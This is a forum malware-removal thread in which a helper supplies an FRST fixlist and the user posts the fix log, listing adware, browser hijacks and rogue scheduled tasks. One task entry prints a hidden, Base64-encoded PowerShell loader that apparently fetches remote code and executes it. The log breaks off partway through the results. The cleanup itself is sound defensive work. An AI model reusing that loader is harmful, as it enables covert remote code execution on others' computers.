Partition: GPT.

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 7.2 GB) (Disk ID: BF9CEC9C)
Partition 1: (Not Active) - (Size=7.2 GB) - (Type=0C)

==================== End of Addition.txt ============================

 

[Broni]

Uninstall following unwanted programs:

Pool Component
Setup

Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

After restart see if you can connect.

 

[hersheychoco]

Is it okay to keep the files on my usb drive or should I move them before the download?

 

[Broni]

You should have all tools I ask you to use on your Desktop.

 

[hersheychoco]

Okay I'll move them there, cause I'm using my PC for internet.

 

[hersheychoco]

Fix result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
Ran by hersheychoco9 (2016-01-05 20:30:10) Run:1
Running from D:\Utilities
Loaded Profiles: hersheychoco9 (Available Profiles: hersheychoco9 & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
() C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
C:\Users\hersheychoco9\AppData\Local\BrowserAir
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [ezvtum] => rundll32.exe "C:\Users\hersheychoco9\AppData\Local\ezvtum.dll",ezvtum <===== ATTENTION
C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {4d6de65c-5455-11e4-825b-a0886955d281} - "D:\VZW_Software_upgrade_assistant.exe"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {65359199-e247-11e4-828b-a0886955d281} - "D:\HTC_Sync_Manager_PC.exe"
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
ProxyServer: [S-1-5-21-1030869394-3123877279-975090705-1001] => http=127.0.0.1:8800
Winsock: Catalog9 01 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 02 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 03 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 04 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 16 C:\Windows\system32\Comvud.dll No File
RemoveProxy:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM-x32 -> DefaultScope {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
SearchScopes: HKU\S-1-5-21-1030869394-3123877279-975090705-1001 -> {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
FF Homepage: user_pref("browser.startup.homepage","hxxp://www.only-search.com/?babsrc=HP_kms&affID=970000014");
FF SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)");: user_pref("browser.search.selectedEngine","Search The Web (Only-Search)");
FF DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)");: user_pref("browser.search.defaultenginename","Search The Web (Only-Search)");
FF Keyword.URL: user_pref("keyword.URL","hxxp://www.only-search.com/?babsrc=KW_kms&affID=$afltId$&q=");
FF NewTab: user_pref("browser.newtab.url","hxxp://www.only-search.com/?babsrc=NT_kms&affID=970000014");
FF SearchPlugin: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml [2015-12-28]
C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml
FF HKLM\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [jid1-xNAj4KGyf5wyhg@jetpack] - C:\Program Files (x86)\Faster Web\faster-web.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
S2 NetprotAdp; no ImagePath
S2 SushiLeadsUpdaterService; no ImagePath
S2 Update Simple for You; no ImagePath
S2 WajaNetEn Monitor; no ImagePath
S3 WsDrvInst; no ImagePath
S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]
S1 cherimoya; system32\drivers\cherimoya.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 iscFlash; \??\C:\Users\HERSHE~1\AppData\Local\Temp\7zS2B1B.tmp\iscflashx64.sys [X]
S3 PCDSRVC{3B54B31B-D06B6431-06020200}_0; \??\c:\program files\dell\supportassist\pcdsrvc_x64.pkms [X]
S3 X6va029; \??\C:\Windows\SysWOW64\Drivers\X6va029 [X]
S1 {b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64; system32\drivers\{b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64.sys [X]
2015-12-28 23:08 - 2015-12-28 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\BrowserAir
2015-12-28 23:06 - 2015-12-29 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\Documents\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean
2014-10-10 07:45 - 2014-10-09 17:10 - 27674200 _____ () C:\Program Files (x86)\Roboscan_IS_Free.exe
2015-05-01 20:00 - 2015-12-20 01:43 - 0000132 _____ () C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
2015-12-28 23:01 - 2015-12-28 23:02 - 0001282 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log
2015-12-28 23:01 - 2015-12-28 23:02 - 0005761 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log
2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log
2015-12-28 23:01 - 2015-12-28 23:01 - 0000097 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log
2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log
2015-12-28 22:57 - 2015-12-28 22:57 - 0009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
2015-04-08 10:52 - 2015-04-08 10:52 - 0002493 _____ () C:\Users\hersheychoco9\AppData\Local\recently-used.xbel
2015-12-28 22:57 - 2015-12-28 22:57 - 0002560 _____ () C:\Users\hersheychoco9\AppData\Local\uninstall.exe
2014-05-13 21:05 - 2014-05-13 21:05 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-12-28 23:16 - 2015-12-28 23:16 - 0001520 _____ () C:\ProgramData\tempimage.bmp
Task: {12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27} - System32\Tasks\Pool Component => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll",#1 <==== ATTENTION
C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll
Task: {63B79E46-FBBD-4C8A-B7AA-45C6731402FF} - System32\Tasks\IBUpd2 => C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe [2015-12-22] ()
Task: {75F57505-E997-49EF-8280-CBEDA94B26CE} - System32\Tasks\Seventh => C:\Users\hersheychoco9\AppData\Roaming\Seventh\Seventh.exe <==== ATTENTION
C:\Users\hersheychoco9\AppData\Roaming\Seventh
Task: {82DB69B4-7124-4705-AFC2-219F5EBB3241} - System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9ADYATwBXAEQAegBmAFIAVwBLAEgALQBoAHYANAB1AC0ALQBEADQAUABHAEgAaQBwAF8ANQBWAEUATQBRAHAAegAwAEIASQA0AGwARwBPAHcAMgBuAGMAbQBsAEgAYgBqAGMASgBtAFIAUwBVAE4ATQBOAHcAdwAzAFkAUgBjAFQAWQBTAGwAdwBXAGEAbgBvAGcANgAyAEwAWQBPAEUAUAB1ADMANAA5AE0AaAB4AEsASABvAFcAVABPADkAWgBmAEMAawBJAHkAcQBHAFgAcgB6ADIAUABhAEIAMQBLAFcAaQBkAHYAQwBqAHQAXwBQAEEAOQBYAHEAVgAwAHoAZwAyAHUAVQBJAGcAUgBWAEMAcwByAHEANgA4AEkASAAyAEYAQgA4AGIAWgBUAE4AZgBZAFIAUQBqAHEAYgBHAGYANAB6AGwAOQBjAHUASwBsAEEANQBnAFAALQBnAFMATABKAE4AdQBKAEcAWQBFADkAQQBtAFoAMgBZAG0AWQBTADUAdwB0AEYAZAB1AF8ANABpADIANgBTAGMAQQBUAHcAawBLAFIAWgBKAHIAZABGAE8AWgBoADgARAA2AHkASABMAHQAeQBhAE4ANABBADUAdABqAG0AQQA2AHUAWgBiAGkAcgBmAEsAMgB6AHoAMQBiAEMAeABEAFIAbgA1AEwATgBXAEsANgBKAHEAVABOAFYAbAAzADUATwBwAEEAbwAzADEAaQBqAHEAcgBPAGkAawBPAHcAbgBvAFIATAB6AGQARgBuAE0AQQBrAG8ASQBPAGoATAB2AE8ASgBzADQAVAAtAHgATwA3AE8AZgBvAGwAQgBrAHgAVwB6AEIAWgBpAEMAOABMAFkAagBFADMARAB5AGMARQBIADEAWQAyADIAUwB4AEMAZQBiAHcANgBYAEMAUQAzAGMAWAB5AGIAXwBQAGQAYgAwAFoAUAA1ADEASABKAG4AdQBGAFcAagAwAHoAXwBwAFUAcABsAEQALQBLAFMAbQBoAFkAcQBrAEEAQwBzAEMAQwBZAFUALQBfAEIAYwBjAFkAbQB3AGEAbABuAHYARABRAEMAUABEAC0ARQBVADYARwBUAEUAbgBjAG8AcABmAFAAWQBXAEYAaQBEAG4AVABXADUAZABkAFgAcgA3AFgAcABzADYAQQBmAHkAeABBAFYAZwAwAFIAOQBzAGYAcwBZAHgANABnADkAdAAzAG0AawBrAEkAVQBOAEUAbwBBADEAQQBRADQARQBqAE4ATQAyADEASwBVAEcAUgBaAG8AMQBWAEEAMgBkAHUASABPADUAQwBjADAAOQBuADMAYgBxAHoARABrAG8AVQBIAGYANABxAEgARgBEADEAbQBVAG4ALQBuAEgATABqAG0AbQB6AEwAUwA5AEcATQBwAEEAUwBjAEcAVAB3AHYAaQA5AEwAVwBlADIASwBwADMAegB0AGgASABQAGwAdABiADYAdwBxAF8AdwBTAGsAdABkAFAAYwBTAEsAZAA3AGIAdwBEAGcAbwB0ADIAbAA4AE8AYQB4AFIAYwBWAEcAVwBDAFQAcQAyAGwAMQBwADUATwB4AEcAbgBCAFUATQAxAFIAdQBsAHgAWgBjADYAMQBZAFAARQBnAG4AMAB5AEkAYQB6AEkAVgB6AGYARwBNAC0AagBOAEQAUQBCAE0AdQB3AHAAMgBWAFEAQwB5AE4AOQBHAHoAawBtAG8AeQAyAE0AagAxAEEARABQAHkAYgBUAGwAawBxAFUATAB6AHAAQQBtAGgAZwBuAGwARQA2AFUAOQBWADQAdgB4ADIAUgBHAGoASwBfAFkAUAA4AEcAMwA0AFkANwBoAHcAUQBkAEIAVQBNAFMAQwAyAGYANAAwAGkAeQByAEYANABCADIAMgByAFoAWABoAFQAUgBCAHUAawBwAE0AQwBMAEsAaQBPAGkAagBRAG0AdwBTADMAQwBGAG4AcQBxADUAdAB4AFQAZwB3ADgARQBnAFkANwBUAFgAcwBlAG8AVQBKAHEAUQBtAHoATwBrADEATgBQAHAAVQBsADYAegBkAEUATABLAG8ATgByAHQAWABKAF8AOABtAGEASAAxAHIAMgBNAGEAagBLAFMAcgBJAGsAcQAxAGIANABPAEUAUwBXAHUAawA4AHUAMQBaAHEAQQAxAEwASQBKAHYAYQBqADAAYQBqAHIAVQBFAGYASgB6AGQAUwAtADcAXwB5AFcAMgBfAEgAUwBmAEUAWQB0AG8ANQAyAGQAXwA1AHEAYwBtAHMAegB4AFgAUgBkAFgAOABZAHYAOABIAFAAXwBjAFUALQBTADcAMQBSAEoAZgA0ADIANgA2AEwALQBBAHcAZQBEAE0AMQBrACYAYwA9ADcAaQBlAGgAMwB4AGsAcQB6AEwAUABwAG4AbABrAFoAZgBuAHEANABYADMAOQBoAE4AegAwAHcAdABfAE4AMABPADgAXwAtAHkAdgBDAHAAbwBpAHoANgBXAFcAOABGAEUAdQBvAEkASABZADcAawBqAGgAVgBsAGgASgAtAGwATAAyAHYAUwBtAFcAQQA1AFEAVgAyAG0AUgB5AFMAOABRAEIAeABuAFcAVwByADgAQQBmAGsAXwBXAEUAWQBaAHEASQBvAHkAcQAzAGwAZAByAFYAcQBVAEgAegBzAGgARwBHAHkAdgBsAEUAagA0ADEAMQBXAEoAegBYAFUAYgBDAGEAdgBVAFMAcwBhADUASwBEADMANQBjAHAAdwBBAFUAUgBnAHUAawAzAHIAdgBjAHgANQBJADgAeABSAFMANgBqAGYAZgBLAFcAbwBPADkARAA3ADcAagBfAFMAcwBYAGQAYwBfADUANgBDAEwAUwBZAFYAVwBFAGEAUwBFAFEAVgB4AGsAUABLAHoAUQBIAFkATgBJAHQAcAAzAGoAMABOAGMAUgBIAEEAcABTAEEAbwBwAE0AcwB4AHMASABDAHMAUQAtAFQAbQBjAFMAZQA0AHoAdgBOAFYAagBPAE0AdwA3AHMAdAAwAFAALQBqAEYATwBtAEgASwB4AFUALQBNAG8AdABxAFAASgBnAFgAXwBJADMAVgA2ADYAUwA4AEoAQgBxAEMAbAA1AEMASgB1AHkAYQBNADAAMABaAGIAaABEAEkAMQBfAHkAYgBaAEYASABoAGkAaQB2ADUAQgBuAGYAeABSAFUAYQBhAHQAawBhADEAZQBBAEsATwBfADUAcgBiADEATQBQAFcAdABPADQATABFAFoAbgBoAGgAVgBPADMAVwBmAE8AMQBVAHEANQBhAE0AVQB1AGQAUgBzADIAWABGAEoASgBxAFIATgBjADAAaABLAEwAMAA1AEcAcwBhAHkAcQA3AFEAbwBWAGMAMgBmAGoAMABaAC0AcQBWAG8AawBfADMAYgBGAFkAcgAyAHMAdwBnAHgAbwBiAHEAWgBRAGgAWgBRAG8AbQBWAHAANwA2AHYANgBkAHgAdgBBADIAaQA2AHgAWQBwADIAaQBVAE0AMwB2AFcAbAB2AEoATQBkADMARQBUAFEAOABLADkAYQBSAGoAOQBaADcASwBxAGcAdQBLAGcAawBsAEYAcgByAEsAMgB2AFIAVwB3ADAAUABoAEsASgBiADQAQQBiAG8AcAAyAGkATwBlAHoAdgBqAEMAbgAxAHIAOAA0AEcATwB0AFAARwAtADAATQBSAEYAdgBoAFgAZwBUAGEANQBxAEIATwBuAEYAbQBCAHEAcgBKAFoAaQBmADQAWAA2AFIAbgA1AFcAbQA3ADQAbABuAFIALQBtAGgAagBDAHQAaABGAGoAaQBUAE4AegBJAHkAcwBtADIAbwBHAFIAVgBfAG4AaAA3AGwANgBMAEcASABXAHAASQBUAEwAcABlAGkAUABVAFgAeQBjAGEAWgBCAGoAZQBoAFQAeQBUADIASgA3AHoASwBxAFoAYQBmAG4AMgBoADIASABKAGwAYwBjAFkAdwB3AGIAcQBPADgAUgA0AE4AbgBBAGkAVAB0AHgAWQBXAFYAXwBtAG4AMABXAHQAZQBvAG0ARgBzAEcAOQBBAGgAaQBWADEAVAA2AFcANQBEADgATABFAHkAQgBNAGkAegBnADYAdQBsAC0ARwAtAE4ARAB0AGUAaQAzAG4AZAAwAEMAXwBMAFYAMgBQAEYAcQAxAFoAMQBoAFEAbQBzAEEAOABVAEwAdQBiAF8ANwBiAHEASQBPAHIAeAB5AFkAWAB0AFIAMABwAHYAUQBvAFgAZAB3AFcAMQBKAHoAWABWAE0ASQBRAFkAMwA3AFYAeABDAHoAZAA0AHkAYQAyAHgAUwBhAHIAbgBhAEcAagBWAC0ASgA4AFcASgAyAEkAUQBLAF8AegBMAGEASAAtAFMASwBWAFoAMwBXAFEAbwA0ADIAZQBfAFQAOAB1ADcAcwBEAGQAcgBlAE0AMgBDAHMARwB6AE4ARABzAG8AcwBDAGEAOQBLADIAZwBpADgAVABKAEcAXwBPAHkAbgA1AHAAVABzADUAcwBlAHoAOQB5AFUASQBkAGcAVgBlAGUAZgA4AGsAQgA0ADEAcwBOADcAUQBtAE0ATABsAHcAegBXAHQATQByAGcAcABMAGUATgBLAHoAUABkADMAegA3AEsAQQBCADUAQgBIAFIASAB0AEsAMQByAFkAOAA3AHcAMQBlADUANgBMAFkAVQBaAHgAVwBjAEoAQwBNADAATAAzAFAAMwB0AFEAdQB0AFMAdwB5AFoAdwBMAGkALQBmAGsANgAxAFEAeAAwAGwAMwBWAFYAXwBUAE8AYgBWAGYAJgByAD0ANwA3ADEAOQA4ADcAOQA5ADMAMAAyADMANQA3ADEAMwAwADUAMQAiADsAJABzAHQAcwBrAD0AIgB7ADAARgAwAEYANwBEADQANwAtADcARQAwADgALQA3AEQAMABCAC0ANwA4ADEAMQAtADcARAAwAEMAMAA1ADAAQgAxADEAMABEAH0AIgA7ACQAcAByAGkAZAA9ACIAUwB5AHMAdABlAG0ASABlAGEAbABlAHIAIgA7ACQAaQBuAGkAZAA9ACIAWABRAFUATwAyAFkAVwBZACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {86B9E75F-1889-49B5-B36A-35C70EC3D395} - System32\Tasks\Pool Component2 => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll",#1 <==== ATTENTION
C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll
Task: {9CCB0C95-9CC9-4F2E-8D83-663775D82970} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
C:\Program Files (x86)\OLBPre
Task: {B1D873D1-5121-42A0-9C92-76FBCD27335F} - System32\Tasks\Sixth => C:\Users\hersheychoco9\AppData\Roaming\Sixth\Sixth.exe [2015-12-10] () <==== ATTENTION
C:\Users\hersheychoco9\AppData\Roaming\Sixth
Task: {CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611} - System32\Tasks\Ijufcyl => C:\PROGRA~1\SHOPPE~1\Osifch.bat
C:\PROGRA~1\SHOPPE~1
C:\PROGRA~1\SHOPPE~1\Osifch.bat
Task: {D07CC060-B787-4C15-B547-123801C27E3B} - System32\Tasks\Only-search Updater => C:\Windows\system32\wscript.exe [2014-10-28] (Microsoft Corporation) <==== ATTENTION

Task: {80FA20B2-A979-4EAB-9EBA-6D46F57955A1} - System32\Tasks\Genius => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] () <==== ATTENTION
C:\Users\hersheychoco9\AppData\Roaming\Genius


*****************

[5112] C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe => process closed successfully.
C:\Users\hersheychoco9\AppData\Local\BrowserAir => moved successfully
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Windows\CurrentVersion\Run\\ezvtum => value removed successfully
C:\Users\hersheychoco9\AppData\Local\ezvtum.dll => moved successfully
"HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4d6de65c-5455-11e4-825b-a0886955d281}" => key removed successfully
HKCR\CLSID\{4d6de65c-5455-11e4-825b-a0886955d281} => key not found.
"HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{65359199-e247-11e4-828b-a0886955d281}" => key removed successfully
HKCR\CLSID\{65359199-e247-11e4-828b-a0886955d281} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => key removed successfully
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003" => key removed successfully
